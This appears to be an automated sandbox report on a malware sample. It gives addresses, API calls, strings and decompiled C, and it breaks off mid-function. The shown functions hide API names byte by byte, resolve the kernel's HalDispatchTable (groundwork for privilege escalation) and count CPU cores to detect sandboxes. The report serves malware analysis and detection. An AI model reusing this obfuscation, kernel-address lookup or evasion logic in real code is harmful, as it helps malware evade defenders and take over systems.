0x0040e214
0x0040e216
0x0040e21c
0x0040e226
0x0040e22e
0x0040e238
0x0040e23e
0x0040e243
0x0040e24a
0x0040e269
0x0040e26e
0x0040e278
0x0040e27e
0x0040e281
0x0040e283
0x0040e287
0x0040e288
0x0040e28d
0x0040e290
0x0040e294
0x0040e295
0x0040e295
0x0040e29e
0x0040e2a1
0x0040e2b1
0x0040e2b6
0x0040e2b9
0x0040e2be
0x0040e2c1
0x0040e2cf
0x0040e2d3
0x0040e2e2
0x0040e2ef
0x0040e2f4
0x0040e2f7
0x0040e2fa
0x0040e2fa
0x0040e2fd
0x0040e2fd
0x0040e2fe
0x0040e303
0x0040e26e
0x0040e307
0x0040e30a
0x0040e310
0x0040e319
0x0040e31a
0x0040e31c
0x0040e326
0x0040e32b
0x0040e32c
0x0040e32d
0x0040e32e
0x0040e331
0x0040e334
0x0040e33d
0x0040e340
0x0040e341
0x0040e34c
0x0040e355
0x0040e358
0x0040e35e
0x0040e363
0x0040e368
0x0040e378
0x0040e379
0x0040e383
0x0040e386
0x0040e388
0x0040e390
0x0040e391
0x0040e394
0x0040e398
0x0040e39e
0x0040e3aa
0x0040e3ba
0x0040e3bf
0x0040e3bf
0x0040e368
0x0040e3c6
0x0040e3cc
0x0040e3d1
0x0040e3d6
0x0040e3db
0x0040e3dd
0x00000000
0x0040e3df
0x0040e3e1
0x0040e3e4
0x0040e3e5
0x0040e3e8
0x0040e3f1
0x0040e3f7
0x0040e3fd
0x0040e400
0x0040e407
0x0040e40e
0x0040e414
0x0040e419
0x0040e420
0x0040e422
0x0040e425
0x00000000
0x0040e425
0x0040e3dd

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E120
lstrlenW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E214

Part of subcall function 0041071A: GetModuleHandleW.KERNEL32(?,Wow64Disab), ref: 004107AD
Part of subcall function 0041071A: GetProcAddress.KERNEL32(00000000), ref: 004107B4

GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040E238
lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E24A
lstrlenW.KERNEL32(?,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E255
GetSystemDirectoryW.KERNEL32(00000000,?), ref: 0040E278
lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E283
lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E290
lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E29A

Part of subcall function 004102FA: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00410449
Part of subcall function 004102FA: CloseHandle.KERNEL32(00000000), ref: 00410509

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

lstrlenW.KERNEL32(?), ref: 0040E386

Part of subcall function 00410A5F: GetModuleHandleW.KERNEL32(?,Wow64R), ref: 00410AFA
Part of subcall function 00410A5F: GetProcAddress.KERNEL32(00000000), ref: 00410B01

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Part of subcall function 00410547: CloseHandle.KERNEL32(?), ref: 0041066B

Strings

oadD, xrefs: 0040E1E2
N, xrefs: 0040E057
i, xrefs: 0040E0A5
e, xrefs: 0040E40E
ma, xrefs: 0040E09C
Qu, xrefs: 0040E07F
hTab, xrefs: 0040E407
n, xrefs: 0040E0A9
ySys, xrefs: 0040E088
LdrL, xrefs: 0040E1DA
mInf, xrefs: 0040E092
Ha, xrefs: 0040E3F1
patc, xrefs: 0040E400
Di, xrefs: 0040E3F7

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: lstrlen$Handle$Virtual$AddressCloseDirectoryFreeModuleProcSystem$AllocCreateFileLibraryLoad
String ID: Di$Ha$LdrL$N$Qu$e$hTab$i$mInf$ma$n$oadD$patc$ySys
API String ID: 2277089932-104261511
Opcode ID: 0b10cac87e0b24d4c45b11fa8e3c250660e00519dc2db7ed7040513660314c48
Instruction ID: 10c451a715c33ba41af8cd5426531a0fb72a87cd18181a29e2a418a59abe5830
Opcode Fuzzy Hash: 0b10cac87e0b24d4c45b11fa8e3c250660e00519dc2db7ed7040513660314c48
Instruction Fuzzy Hash: 46E18F71E00358AEDB20DBE5DC41BEEBBB5EF48700F1044AAE508F7291E7755A84CB69

Uniqueness

Uniqueness Score: 100.00%

Function 0040E46A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 189
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 73%

			E0040E46A() {
				char _v5;
				char _v12;
				signed int _v16;
				short _v21;
				char _v22;
				char _v23;
				char _v24;
				intOrPtr _v28;
				char _v29;
				intOrPtr _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				short _v54;
				char _v55;
				char _v56;
				intOrPtr _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				void* _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _t68;
				short _t69;
				short _t70;
				short _t71;
				char _t73;
				char _t74;
				struct HINSTANCE__* _t76;
				short _t88;
				char _t89;
				char _t92;
				short _t94;
				short _t95;
				short _t96;
				short _t97;
				short _t98;
				short _t99;
				char _t105;
				intOrPtr* _t106;
				WCHAR* _t107;
				short _t108;
				short _t109;
				char _t110;
				short _t116;
				short _t117;
				char _t118;
				void* _t119;
				intOrPtr* _t120;
				struct HINSTANCE__* _t121;

				_t109 = 0x70;
				_t118 = 0x73;
				_t68 = 0x61;
				_v76 = _t68;
				_t119 = 0;
				_v80 = _t109;
				_v74 = _t109;
				_t110 = 0x69;
				_t69 = 0x2e;
				_v70 = _t69;
				_t70 = 0x64;
				_v68 = _t70;
				_t71 = 0x6c;
				_v66 = _t71;
				_v64 = _t71;
				_v62 = 0;
				_t73 = 0x6e;
				_v55 = _t73;
				_t74 = 0x65;
				_t105 = 0x72;
				_v51 = _t74;
				_v47 = _t74;
				_v42 = _t74;
				_v78 = _t118;
				_v72 = _t110;
				_v56 = 0x45;
				_v54 = 0x6d75;
				_v52 = 0x44;
				_v50 = 0x76;
				_v49 = _t110;
				_v48 = 0x63;
				_v46 = 0x44;
				_v45 = _t105;
				_v44 = _t110;
				_v43 = 0x76;
				_v41 = _t105;
				_v40 = _t118;
				_v39 = 0;
				_t76 = LoadLibraryW( &_v80);
				if(_t76 == 0) {
					L11:
					return 0;
				}
				_t29 =  &_v56; // 0x45
				_t106 = GetProcAddress(_t76, _t29);
				if(_t106 == 0) {
					goto L11;
				}
				 *_t106( &_v16, 0,  &_v12);
				if(_v12 <= 0) {
					goto L11;
				}
				_t120 = E0040C6BA(_v12);
				if(_t120 != 0) {
					_push( &_v12);
					_push(_v12);
					_push(_t120);
					if( *_t106() != 0 &&  *_t120 != 0) {
						_t119 =  *_t120;
					}
				}
				E0040C6D1(_t120);
				_t128 = _t119;
				if(_t119 != 0) {
					_v16 = _v16 & 0x00000000;
					_v5 = 0;
					_t107 = E0040D37B(_t128,  &_v16);
					if(_t107 == 0) {
						goto L11;
					}
					_t121 = LoadLibraryExW(_t107, 0, 1);
					E0040C6D1(_t107);
					_t88 = 0x74;
					if(_t121 != 0) {
						_t108 = 0x6c;
						L14:
						_t89 = 0x61;
						_v35 = _t89;
						_v29 = _t89;
						_v24 = _t89;
						_v36 = 0x48;
						_v34 = _t108;
						_v33 = 0x70736944;
						_v28 = 0x54686374;
						_v23 = 0x62;
						_v22 = _t108;
						_v21 = 0x65;
						_t92 = GetProcAddress(_t121,  &_v36) - _t121;
						__eflags = _v5;
						if(_v5 != 0) {
							_t92 = _t92 + _v16;
							__eflags = _t92;
						}
						return _t92 + _t119;
					}
					_t116 = 0x6e;
					_v106 = _t88;
					_t94 = 0x6f;
					_v104 = _t94;
					_t95 = 0x73;
					_v102 = _t95;
					_t96 = 0x6b;
					_v100 = _t96;
					_t97 = 0x72;
					_t108 = 0x6c;
					_v98 = _t97;
					_t98 = 0x2e;
					_v108 = _t116;
					_v96 = _t116;
					_t117 = 0x65;
					_v92 = _t98;
					_t99 = 0x78;
					_v88 = _t99;
					_v84 = 0;
					_v94 = _t108;
					_v90 = _t117;
					_v86 = _t117;
					_t121 = LoadLibraryExW( &_v108, 0, 1);
					_v5 = 1;
					if(_t121 != 0) {
						goto L14;
					}
				}
			}

0x0040e475
0x0040e478
0x0040e47b
0x0040e47e
0x0040e482
0x0040e484
0x0040e488
0x0040e48c
0x0040e48f
0x0040e492
0x0040e496
0x0040e499
0x0040e49d
0x0040e49e
0x0040e4a2
0x0040e4aa
0x0040e4ad
0x0040e4b0
0x0040e4b3
0x0040e4b6
0x0040e4b7
0x0040e4ba
0x0040e4bd
0x0040e4c4
0x0040e4c8
0x0040e4cc
0x0040e4d0
0x0040e4d6
0x0040e4da
0x0040e4de
0x0040e4e1
0x0040e4e5
0x0040e4e9
0x0040e4ec
0x0040e4ef
0x0040e4f3
0x0040e4f6
0x0040e4f9
0x0040e4fd
0x0040e505
0x0040e604
0x00000000
0x0040e604
0x0040e50b
0x0040e516
0x0040e51a
0x00000000
0x00000000
0x0040e529
0x0040e52e
0x00000000
0x00000000
0x0040e53c
0x0040e541
0x0040e546
0x0040e547
0x0040e54a
0x0040e54f
0x0040e555
0x0040e555
0x0040e54f
0x0040e558
0x0040e55e
0x0040e560
0x0040e566
0x0040e56e
0x0040e577
0x0040e57c
0x00000000
0x00000000
0x0040e58e
0x0040e590
0x0040e598
0x0040e59b
0x0040e60f
0x0040e610
0x0040e612
0x0040e613
0x0040e616
0x0040e619
0x0040e621
0x0040e625
0x0040e628
0x0040e62f
0x0040e636
0x0040e63a
0x0040e63d
0x0040e649
0x0040e64b
0x0040e64f
0x0040e651
0x0040e651
0x0040e651
0x00000000
0x0040e654
0x0040e59f
0x0040e5a2
0x0040e5a6
0x0040e5a9
0x0040e5ad
0x0040e5b0
0x0040e5b4
0x0040e5b7
0x0040e5bb
0x0040e5be
0x0040e5c1
0x0040e5c5
0x0040e5c8
0x0040e5cc
0x0040e5d0
0x0040e5d3
0x0040e5d7
0x0040e5d8
0x0040e5e1
0x0040e5e8
0x0040e5ec
0x0040e5f0
0x0040e5fa
0x0040e5fc
0x0040e602
0x00000000
0x00000000
0x0040e602

APIs

LoadLibraryW.KERNEL32(?), ref: 0040E4FD
GetProcAddress.KERNEL32(00000000,EDc), ref: 0040E510
GetProcAddress.KERNEL32(00000000,?), ref: 0040E643

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

LoadLibraryExW.KERNEL32(00000000,00000000,00000001), ref: 0040E587
LoadLibraryExW.KERNEL32(?,00000000,00000001), ref: 0040E5F4

Strings

D, xrefs: 0040E4E5
c, xrefs: 0040E4E1
b, xrefs: 0040E636
v, xrefs: 0040E4EF
um, xrefs: 0040E4D0
v, xrefs: 0040E4DA
H, xrefs: 0040E621
Disp, xrefs: 0040E628
EDc, xrefs: 0040E50B, 0040E50E
D, xrefs: 0040E4D6
tchT, xrefs: 0040E62F
e, xrefs: 0040E63D

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcVirtual$AllocFree
String ID: D$D$Disp$EDc$H$b$c$e$tchT$um$v$v
API String ID: 608657885-2384844925
Opcode ID: aad624c68dd3fab685b1741f26c8501bb1749ff0388c6c6dd3e74278f34471e6
Instruction ID: cd1b4cce11a2c7727d5f5dcfa912337f48a2473e25c5a1b33316810f596617aa
Opcode Fuzzy Hash: aad624c68dd3fab685b1741f26c8501bb1749ff0388c6c6dd3e74278f34471e6
Instruction Fuzzy Hash: 0961C422D48388EDEB21CBE4E845BEEBB759F25710F14045BE604FB2D1E6B60954C36E

Uniqueness

Uniqueness Score: 100.00%

Function 0040DDE7, Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 120
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 78%

			E0040DDE7() {
				char _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				char _v41;
				intOrPtr _v45;
				char _v46;
				char _v47;
				short _v49;
				char _v50;
				short _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				short _v58;
				intOrPtr _v62;
				char _v63;
				char _v64;
				short _t39;
				short _t40;
				short _t41;
				short _t42;
				short _t43;
				char _t45;
				_Unknown_base(*)()* _t49;
				void* _t53;
				long _t59;
				char _t60;
				void* _t63;
				char _t65;
				void* _t66;
				char _t67;
				void* _t69;

				_t39 = 0x6b;
				_t65 = 0x65;
				_v32 = _t39;
				_t59 = 0;
				_t40 = 0x72;
				_v28 = _t40;
				_t67 = 0;
				_t41 = 0x6e;
				_t60 = 0x6c;
				_v26 = _t41;
				_t69 = 0;
				_t42 = 0x33;
				_v20 = _t42;
				_t43 = 0x32;
				_v18 = _t43;
				_v16 = 0;
				_t45 = 0x72;
				_v53 = _t45;
				_v46 = _t45;
				_v41 = _t45;
				_v8 = 0;
				_v30 = _t65;
				_v24 = _t65;
				_v22 = _t60;
				_v64 = 0x47;
				_v63 = _t65;
				_v62 = 0x676f4c74;
				_v58 = 0x6369;
				_v56 = 0x61;
				_v55 = _t60;
				_v54 = 0x50;
				_v52 = 0x636f;
				_v50 = _t65;
				_v49 = 0x7373;
				_v47 = 0x6f;
				_v45 = 0x6f666e49;
				_v40 = 0x6974616d;
				_v36 = 0x6e6f;
				_v34 = 0;
				_t49 = GetProcAddress(GetModuleHandleW( &_v32),  &_v64);
				_v12 = _t49;
				if(_t49 != 0) {
					while(1) {
						_push( &_v8);
						_push(_t69);
						if( *_t49() != 0) {
							goto L8;
						}
						if(GetLastError() != 0x7a) {
							goto L1;
						}
						if(_t69 != 0) {
							VirtualFree(_t69, _t59, 0x8000);
						}
						_t69 = E0040C6BA(_v8);
						if(_t69 == 0) {
							goto L1;
						} else {
							L9:
							if(_t67 != 0) {
								_t66 = 0x18;
								if(_v8 < _t66) {
									L16:
									if(_t69 != 0) {
										E0040C6D1(_t69);
									}
									return _t59;
								}
								_t53 = _t66;
								_t36 = _t69 - 0x14; // -20
								_t63 = _t36;
								do {
									if( *((intOrPtr*)(_t63 + _t53)) == 3) {
										_t59 = _t59 + 1;
									}
									_t53 = _t53 + _t66;
									_t69 = _t69 + _t66;
								} while (_t53 <= _v8);
								goto L16;
							}
							_t49 = _v12;
							continue;
						}
						L8:
						_t67 = 1;
						goto L9;
					}
				}
				L1:
				return 1;
			}

0x0040ddf2
0x0040ddf5
0x0040ddf8
0x0040ddfc
0x0040ddfe
0x0040de01
0x0040de05
0x0040de07
0x0040de0a
0x0040de0d
0x0040de11
0x0040de13
0x0040de16
0x0040de1a
0x0040de1b
0x0040de23
0x0040de26
0x0040de27
0x0040de2a
0x0040de2d
0x0040de37
0x0040de3b
0x0040de3f
0x0040de43
0x0040de47
0x0040de4b
0x0040de4e
0x0040de55
0x0040de5b
0x0040de5f
0x0040de62
0x0040de66
0x0040de6c
0x0040de6f
0x0040de75
0x0040de79
0x0040de80
0x0040de87
0x0040de8d
0x0040de97
0x0040de9d
0x0040dea2
0x0040dea9
0x0040deac
0x0040dead
0x0040deb2
0x00000000
0x00000000
0x0040debd
0x00000000
0x00000000
0x0040dec1
0x0040deca
0x0040deca
0x0040ded8
0x0040dedd
0x00000000
0x0040dedf
0x0040dee4
0x0040dee6
0x0040deef
0x0040def3
0x0040df0a
0x0040df0c
0x0040df0f
0x0040df14
0x00000000
0x0040df15
0x0040def5
0x0040def7
0x0040def7
0x0040defa
0x0040defe
0x0040df00
0x0040df00
0x0040df01
0x0040df03
0x0040df05
0x00000000
0x0040defa
0x0040dee8
0x00000000
0x0040dee8
0x0040dee1
0x0040dee3
0x00000000
0x0040dee3
0x0040dea9
0x0040dea4
0x00000000

APIs

GetModuleHandleW.KERNEL32(?,?,00000000,00000000,w@), ref: 0040DE90
GetProcAddress.KERNEL32(00000000), ref: 0040DE97
GetLastError.KERNEL32 ref: 0040DEB4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040DECA

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

tLog, xrefs: 0040DE4E
P, xrefs: 0040DE62
ss, xrefs: 0040DE6F
mati, xrefs: 0040DE80
Info, xrefs: 0040DE79
on, xrefs: 0040DE87
o, xrefs: 0040DE75
w@, xrefs: 0040DDED
G, xrefs: 0040DE47
a, xrefs: 0040DE5B
ic, xrefs: 0040DE55
oc, xrefs: 0040DE66

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$Free$AddressAllocErrorHandleLastModuleProc
String ID: G$Info$P$a$ic$mati$o$oc$on$ss$tLog$w@
API String ID: 3609081390-3694690320
Opcode ID: 44d38d10aaa8ffe5a6edbaa72c6ecb408e3362b5b6935576e2d4cf9816fb80c2
Instruction ID: ac25e806da6d292c6aec3671256392fc9d69babb7dee449f8bb7fc07b03b26f8
Opcode Fuzzy Hash: 44d38d10aaa8ffe5a6edbaa72c6ecb408e3362b5b6935576e2d4cf9816fb80c2
Instruction Fuzzy Hash: C041E132D09249EAEB11DBE4E8417EEBB75EF25710F10402BE404FB291D7794E49C7AA

Uniqueness

Uniqueness Score: 100.00%

Function 0040A37C, Relevance: 25.1, APIs: 20, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A37C(intOrPtr* __ecx) {
				int _t42;
				int _t45;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t68;
				void* _t70;
				intOrPtr* _t83;
				int _t84;
				int _t85;
				int _t86;
				int _t87;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;

				_t83 = __ecx;
				_t70 = 0;
				if( *__ecx != 0) {
					_t68 = lstrlenW( *(__ecx + 8));
					_t70 = _t68 + 4 + lstrlenW( *(_t83 + 4));
				}
				if( *((intOrPtr*)(_t83 + 0xc)) != 0) {
					_t92 = lstrlenW( *(_t83 + 0x14));
					_t66 = lstrlenW( *(_t83 + 0x10));
					_t6 = _t92 + 4; // 0x4
					_t70 = _t6 + _t66 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x18)) != 0) {
					_t91 = lstrlenW( *(_t83 + 0x20));
					_t63 = lstrlenW( *(_t83 + 0x1c));
					_t10 = _t91 + 4; // 0x4
					_t70 = _t10 + _t63 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x24)) != 0) {
					_t90 = lstrlenW( *(_t83 + 0x2c));
					_t60 = lstrlenW( *(_t83 + 0x28));
					_t14 = _t90 + 4; // 0x4
					_t70 = _t14 + _t60 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x30)) != 0) {
					_t89 = lstrlenW( *(_t83 + 0x38));
					_t57 = lstrlenW( *(_t83 + 0x34));
					_t18 = _t89 + 4; // 0x4
					_t70 = _t18 + _t57 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x3c)) != 0) {
					_t88 = lstrlenW( *(_t83 + 0x44));
					_t54 = lstrlenW( *(_t83 + 0x40));
					_t22 = _t88 + 4; // 0x4
					_t70 = _t22 + _t54 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x48)) != 0) {
					_t87 = lstrlenW( *(_t83 + 0x50));
					_t51 = lstrlenW( *(_t83 + 0x4c));
					_t26 = _t87 + 4; // 0x4
					_t70 = _t26 + _t51 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x54)) != 0) {
					_t86 = lstrlenW( *(_t83 + 0x5c));
					_t48 = lstrlenW( *(_t83 + 0x58));
					_t30 = _t86 + 4; // 0x4
					_t70 = _t30 + _t48 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x60)) != 0) {
					_t70 = _t70 + 0x14;
				}
				if( *((intOrPtr*)(_t83 + 0x74)) != 0) {
					_t85 = lstrlenW( *(_t83 + 0x7c));
					_t45 = lstrlenW( *(_t83 + 0x78));
					_t35 = _t85 + 4; // 0x4
					_t70 = _t35 + _t45 + _t70;
				}
				if( *((intOrPtr*)(_t83 + 0x80)) != 0) {
					_t84 = lstrlenW( *(_t83 + 0x88));
					_t42 = lstrlenW( *(_t83 + 0x84));
					_t39 = _t84 + 4; // 0x4
					_t70 = _t39 + _t42 + _t70;
				}
				return _t70;
			}

0x0040a37f
0x0040a381
0x0040a385
0x0040a38a
0x0040a39e
0x0040a39e
0x0040a3a4
0x0040a3b2
0x0040a3b4
0x0040a3bc
0x0040a3bf
0x0040a3bf
0x0040a3c5
0x0040a3d3
0x0040a3d5
0x0040a3dd
0x0040a3e0
0x0040a3e0
0x0040a3e6
0x0040a3f4
0x0040a3f6
0x0040a3fe
0x0040a401
0x0040a401
0x0040a407
0x0040a415
0x0040a417
0x0040a41f
0x0040a422
0x0040a422
0x0040a428
0x0040a436
0x0040a438
0x0040a440
0x0040a443
0x0040a443
0x0040a449
0x0040a457
0x0040a459
0x0040a461
0x0040a464
0x0040a464
0x0040a46a
0x0040a478
0x0040a47a
0x0040a482
0x0040a485
0x0040a485
0x0040a48b
0x0040a48d
0x0040a48d
0x0040a494
0x0040a4a2
0x0040a4a4
0x0040a4ac
0x0040a4af
0x0040a4af
0x0040a4b8
0x0040a4cc
0x0040a4ce
0x0040a4d6
0x0040a4d9
0x0040a4d9
0x0040a4e0

APIs

lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A38A
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A395
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3A9
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3B4
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3CA
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3D5
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3EB
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3F6
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A40C
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A417
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A42D
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A438
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A44E
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A459
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A46F
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A47A
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A499
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4A4
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4C0
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4CE

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 759ebaf83719774b6f8715dc7d730a5a51281b93f0f4631e8fee494454bfb00c
Instruction ID: f6c0225f492404230e4fe4556fe965e2ad832c7a5007f9554e358101a60cdbed
Opcode Fuzzy Hash: 759ebaf83719774b6f8715dc7d730a5a51281b93f0f4631e8fee494454bfb00c
Instruction Fuzzy Hash: 6941FA32601751AFC7115FB9DCCC7C5BBA1BF08309B08C536E60692A71E775A9B8DB48

Uniqueness

Uniqueness Score: 0.03%

Function 00420AC1, Relevance: 22.8, APIs: 15, Instructions: 343
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00420AC1(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr* _v48;
				char* _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				char _v92;
				void* __edi;
				signed int _t118;
				intOrPtr _t120;
				char _t122;
				char _t138;
				signed short _t141;
				signed int _t142;
				void* _t145;
				void* _t148;
				void* _t151;
				void* _t152;
				void* _t155;
				signed int _t157;
				intOrPtr* _t158;
				signed char _t175;
				signed int* _t178;
				char* _t181;
				signed char _t182;
				void* _t189;
				char _t191;
				void* _t194;
				signed int* _t196;
				intOrPtr _t197;
				intOrPtr _t201;
				short* _t205;
				intOrPtr _t206;
				signed int _t207;
				signed char _t214;
				char _t215;
				intOrPtr _t216;
				void* _t220;
				signed int _t221;
				signed char* _t223;
				int* _t225;
				signed char* _t237;
				short* _t238;
				intOrPtr* _t240;
				char* _t242;
				char* _t243;
				intOrPtr* _t247;
				signed int _t248;
				short* _t249;
				void* _t251;
				signed int _t252;
				signed int _t253;
				void* _t254;
				void* _t255;

				_t118 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t118 ^ _t253;
				_t240 = _a4;
				_t191 = 0;
				_v56 = _t240;
				_v32 = 0;
				_v36 = 0;
				_t120 =  *((intOrPtr*)(_t240 + 0xa8));
				_v40 = 0;
				_v44 = 0;
				_v92 = _t240;
				_v88 = 0;
				if(_t120 == 0) {
					__eflags =  *((intOrPtr*)(_t240 + 0x8c));
					if( *((intOrPtr*)(_t240 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t240 + 0x8c)) = _t191;
					_t122 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t240 + 0x90)) = _t191;
					 *_t240 = 0x43c6f0;
					 *((intOrPtr*)(_t240 + 0x94)) = 0x43c970;
					 *((intOrPtr*)(_t240 + 0x98)) = 0x43caf0;
					 *((intOrPtr*)(_t240 + 4)) = 1;
					L48:
					E00415A87();
					return _t122;
				}
				_t225 = _t240 + 8;
				_v48 = 0;
				if( *_t225 != 0) {
					L3:
					_v48 = E00420EFE(1, 4);
					E004214E2(_t191);
					_v32 = E00420EFE(0x180, 2);
					E004214E2(_t191);
					_v36 = E00420EFE(0x180, 1);
